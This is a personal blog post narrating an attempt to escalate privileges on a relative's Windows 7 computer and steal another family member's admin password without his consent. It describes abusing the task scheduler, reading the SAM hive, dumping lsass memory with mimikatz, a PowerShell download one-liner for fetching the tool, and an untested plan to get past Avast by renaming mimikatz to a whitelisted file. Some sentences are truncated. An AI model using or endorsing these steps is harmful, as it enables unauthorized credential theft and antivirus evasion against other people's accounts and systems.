So recently I was at my grandma’s and she only had access to a low-privileged account, as my uncle had configured the system and set a password on the admin account. I figured it would be a nice challenge to get my hands on his password, or get higher privileges in some other way. One thing though, I had to achieve this without rebooting the device.
The task scheduler allows to run programs as
SYSTEM, but unfortunately it doesn’t work with Windows 7. Furthermore, when attempting to run
at <time> /interactive cmd.exe</time> or just
at I was getting an
Then I read something about creating a service that would run
cmd.exe but I still have to little knowledge about services, so I didn’t try it.
There is a registry called SAM (Security Account Manager), which holds all the password hashes. And thanks to Wikipedia we know it is in
%SystemRoot%/system32/config/SAM and that it is inaccessible when Windows is running. However it is also in registry under
HKLM/SAM. So a quick jump to RegEdit and … Access denied.
I remembered one more thing: passwords are kept in plain text in LSA memory, which lead to the next attempt.
Attempt #3 - mimikatz
So there’s this great tool called mimikatz by Benjamin DELPY
gentilkiwi. It’s available on github. One of it’s modules allows to infiltrate the protected memory of the
lsass.exe process. I was hoping to be done soon. And then came the problem: Avast Antivirus. Yeah, I wasn’t even able to download mimikatz. Hopefully it’s possible with powershell:
PS> (new-object System.Net.WebClient).DownloadFile( $url, $path ). But I downloaded a .zip file. And during extraction Avast was searching for viruses. And even when I isolated the file, Avast performed a scan at first run. I think it actually could be bypassed by having a clean program, anything, running it, having Avast check it and add it’s path to clean files, then renaming mimikatz.exe to this clean file, and then running it. I didn’t check that last part, I was too tired, but I’ll make sure to do it next time and see what can I get.